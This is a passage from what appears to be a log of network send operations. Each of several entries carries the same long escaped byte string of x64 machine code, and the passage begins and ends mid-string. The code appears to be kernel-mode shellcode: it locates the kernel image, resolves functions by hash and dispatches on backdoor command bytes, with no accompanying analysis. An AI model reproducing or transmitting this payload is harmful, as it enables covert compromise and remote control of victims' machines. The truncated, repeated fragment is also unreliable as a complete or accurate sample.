ff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 17, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 18, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 19, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x0